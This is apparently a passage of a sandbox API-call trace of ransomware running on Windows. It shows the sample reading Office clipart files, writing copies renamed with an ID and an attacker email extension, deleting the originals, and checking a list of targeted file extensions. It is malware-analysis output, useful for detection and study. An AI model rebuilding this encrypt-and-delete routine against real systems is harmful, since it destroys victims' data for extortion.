	[0169.571] lstrlenW (lpString="J0157177.WMF") returned 12
	[0169.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157177.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0169.636] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=21716) returned 1
	[0169.636] CloseHandle (hObject=0x17c) returned 1
	[0169.636] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157177.wmf")) returned 0x20
	[0169.643] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157177.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.643] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157177.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0169.643] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.643] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.643] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157177.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0169.644] GetLastError () returned 0x0
	[0169.644] ReadFile (in: hFile=0x3c4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x54d4, lpOverlapped=0x0) returned 1
	[0169.664] WriteFile (in: hFile=0x180, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x54e0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x54e0, lpOverlapped=0x0) returned 1
	[0169.667] ReadFile (in: hFile=0x3c4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.667] WriteFile (in: hFile=0x180, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.667] SetEndOfFile (hFile=0x180) returned 1
	[0169.667] CloseHandle (hObject=0x180) returned 1
	[0169.667] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.667] SetEndOfFile (hFile=0x3c4) returned 1
	[0169.669] CloseHandle (hObject=0x3c4) returned 1
	[0169.669] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.670] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157177.wmf")) returned 1
	[0169.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF") returned 63
	[0169.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF") returned 63
	[0169.670] lstrlenW (lpString=".doc") returned 4
	[0169.670] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.670] lstrlenW (lpString=".docx") returned 5
	[0169.670] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0169.670] lstrlenW (lpString=".pdf") returned 4
	[0169.671] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.671] lstrlenW (lpString=".xls") returned 4
	[0169.671] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.671] lstrlenW (lpString=".xlsx") returned 5
	[0169.671] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0169.671] lstrlenW (lpString=".ppt") returned 4
	[0169.671] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF") returned 63
	[0169.671] lstrlenW (lpString=".zip") returned 4
	[0169.671] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.671] lstrlenW (lpString=".rar") returned 4
	[0169.671] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.671] lstrlenW (lpString=".bz2") returned 4
	[0169.671] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.671] lstrlenW (lpString=".7z") returned 3
	[0169.671] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF") returned 63
	[0169.671] lstrlenW (lpString=".dbf") returned 4
	[0169.671] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF") returned 63
	[0169.671] lstrlenW (lpString=".1cd") returned 4
	[0169.671] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF") returned 63
	[0169.671] lstrlenW (lpString=".jpg") returned 4
	[0169.671] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF") returned 63
	[0169.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF") returned 63
	[0169.671] lstrlenW (lpString=".doc") returned 4
	[0169.671] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.671] lstrlenW (lpString=".docx") returned 5
	[0169.671] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0169.671] lstrlenW (lpString=".pdf") returned 4
	[0169.671] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.671] lstrlenW (lpString=".xls") returned 4
	[0169.671] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.671] lstrlenW (lpString=".xlsx") returned 5
	[0169.672] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0169.672] lstrlenW (lpString=".ppt") returned 4
	[0169.672] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.672] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF") returned 63
	[0169.672] lstrlenW (lpString=".zip") returned 4
	[0169.672] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.672] lstrlenW (lpString=".rar") returned 4
	[0169.672] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.672] lstrlenW (lpString=".bz2") returned 4
	[0169.672] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.672] lstrlenW (lpString=".7z") returned 3
	[0169.672] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.672] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF") returned 63
	[0169.672] lstrlenW (lpString=".dbf") returned 4
	[0169.672] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.672] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF") returned 63
	[0169.672] lstrlenW (lpString=".1cd") returned 4
	[0169.672] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.672] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF") returned 63
	[0169.672] lstrlenW (lpString=".jpg") returned 4
	[0169.672] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.672] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.672] lstrlenW (lpString="J0158477.WMF") returned 12
	[0169.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158477.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0169.823] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=17966) returned 1
	[0169.823] CloseHandle (hObject=0x3f0) returned 1
	[0169.823] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158477.wmf")) returned 0x20
	[0169.892] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158477.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158477.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0169.893] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.893] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158477.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0169.894] GetLastError () returned 0x0
	[0169.894] ReadFile (in: hFile=0x388, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x462e, lpOverlapped=0x0) returned 1
	[0169.914] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x4630, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x4630, lpOverlapped=0x0) returned 1
	[0169.916] ReadFile (in: hFile=0x388, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.916] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.916] SetEndOfFile (hFile=0x3c4) returned 1
	[0170.296] CloseHandle (hObject=0x3c4) returned 1
	[0170.296] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.296] SetEndOfFile (hFile=0x388) returned 1
	[0170.299] CloseHandle (hObject=0x388) returned 1
	[0170.299] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0170.300] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158477.wmf")) returned 1
	[0170.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF") returned 63
	[0170.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF") returned 63
	[0170.303] lstrlenW (lpString=".doc") returned 4
	[0170.303] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0170.303] lstrlenW (lpString=".docx") returned 5
	[0170.303] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0170.303] lstrlenW (lpString=".pdf") returned 4
	[0170.303] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0170.304] lstrlenW (lpString=".xls") returned 4
	[0170.304] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0170.304] lstrlenW (lpString=".xlsx") returned 5
	[0170.304] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0170.304] lstrlenW (lpString=".ppt") returned 4
	[0170.304] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0170.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF") returned 63
	[0170.304] lstrlenW (lpString=".zip") returned 4
	[0170.304] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0170.304] lstrlenW (lpString=".rar") returned 4
	[0170.304] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0170.304] lstrlenW (lpString=".bz2") returned 4
	[0170.304] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0170.304] lstrlenW (lpString=".7z") returned 3
	[0170.304] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0170.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF") returned 63
	[0170.304] lstrlenW (lpString=".dbf") returned 4
	[0170.304] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0170.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF") returned 63
	[0170.304] lstrlenW (lpString=".1cd") returned 4
	[0170.304] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0170.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF") returned 63
	[0170.304] lstrlenW (lpString=".jpg") returned 4
	[0170.304] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0170.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF") returned 63
	[0170.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF") returned 63
	[0170.304] lstrlenW (lpString=".doc") returned 4
	[0170.304] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0170.304] lstrlenW (lpString=".docx") returned 5
	[0170.304] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0170.304] lstrlenW (lpString=".pdf") returned 4
	[0170.304] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0170.304] lstrlenW (lpString=".xls") returned 4
	[0170.304] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0170.305] lstrlenW (lpString=".xlsx") returned 5
	[0170.305] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0170.305] lstrlenW (lpString=".ppt") returned 4
	[0170.305] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0170.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF") returned 63
	[0170.305] lstrlenW (lpString=".zip") returned 4
	[0170.305] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0170.305] lstrlenW (lpString=".rar") returned 4
	[0170.305] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0170.305] lstrlenW (lpString=".bz2") returned 4
	[0170.305] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0170.305] lstrlenW (lpString=".7z") returned 3
	[0170.305] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0170.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF") returned 63
	[0170.305] lstrlenW (lpString=".dbf") returned 4
	[0170.305] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0170.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF") returned 63
	[0170.305] lstrlenW (lpString=".1cd") returned 4
	[0170.305] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0170.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF") returned 63
	[0170.305] lstrlenW (lpString=".jpg") returned 4
	[0170.305] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0170.306] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0170.306] lstrlenW (lpString="J0174635.WMF") returned 12
	[0170.306] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174635.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0170.306] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=9736) returned 1
	[0170.307] CloseHandle (hObject=0x388) returned 1
	[0170.307] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174635.wmf")) returned 0x20
	[0170.307] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174635.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0170.307] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174635.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0170.307] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.307] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.307] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174635.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0170.308] GetLastError () returned 0x0
	[0170.308] ReadFile (in: hFile=0x388, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x2608, lpOverlapped=0x0) returned 1
	[0170.311] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x2610, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x2610, lpOverlapped=0x0) returned 1
	[0170.312] ReadFile (in: hFile=0x388, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0170.312] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0170.313] SetEndOfFile (hFile=0x3c4) returned 1
	[0170.313] CloseHandle (hObject=0x3c4) returned 1
	[0170.313] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.313] SetEndOfFile (hFile=0x388) returned 1
	[0170.315] CloseHandle (hObject=0x388) returned 1
	[0170.315] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0170.315] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174635.wmf")) returned 1
	[0170.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF") returned 63
	[0170.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF") returned 63
	[0170.316] lstrlenW (lpString=".doc") returned 4
	[0170.316] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0170.316] lstrlenW (lpString=".docx") returned 5
	[0170.316] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0170.316] lstrlenW (lpString=".pdf") returned 4
	[0170.316] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0170.316] lstrlenW (lpString=".xls") returned 4
	[0170.316] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0170.316] lstrlenW (lpString=".xlsx") returned 5
	[0170.316] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0170.316] lstrlenW (lpString=".ppt") returned 4
	[0170.316] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0170.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF") returned 63
	[0170.316] lstrlenW (lpString=".zip") returned 4
	[0170.316] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0170.316] lstrlenW (lpString=".rar") returned 4
	[0170.316] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0170.316] lstrlenW (lpString=".bz2") returned 4
	[0170.316] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0170.316] lstrlenW (lpString=".7z") returned 3
	[0170.316] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0170.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF") returned 63
	[0170.317] lstrlenW (lpString=".dbf") returned 4
	[0170.317] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0170.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF") returned 63
	[0170.317] lstrlenW (lpString=".1cd") returned 4
	[0170.317] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0170.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF") returned 63
	[0170.317] lstrlenW (lpString=".jpg") returned 4
	[0170.317] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0170.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF") returned 63
	[0170.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF") returned 63
	[0170.317] lstrlenW (lpString=".doc") returned 4
	[0170.317] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0170.317] lstrlenW (lpString=".docx") returned 5
	[0170.317] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0170.317] lstrlenW (lpString=".pdf") returned 4
	[0170.317] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0170.317] lstrlenW (lpString=".xls") returned 4
	[0170.317] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0170.317] lstrlenW (lpString=".xlsx") returned 5
	[0170.317] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0170.317] lstrlenW (lpString=".ppt") returned 4
	[0170.317] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0170.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF") returned 63
	[0170.317] lstrlenW (lpString=".zip") returned 4
	[0170.317] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0170.317] lstrlenW (lpString=".rar") returned 4
	[0170.317] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0170.317] lstrlenW (lpString=".bz2") returned 4
	[0170.317] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0170.317] lstrlenW (lpString=".7z") returned 3
	[0170.317] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0170.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF") returned 63
	[0170.317] lstrlenW (lpString=".dbf") returned 4
	[0170.317] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0170.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF") returned 63
	[0170.318] lstrlenW (lpString=".1cd") returned 4
	[0170.318] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0170.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF") returned 63
	[0170.318] lstrlenW (lpString=".jpg") returned 4
	[0170.318] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0170.318] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0170.318] lstrlenW (lpString="J0174639.WMF") returned 12
	[0170.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174639.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
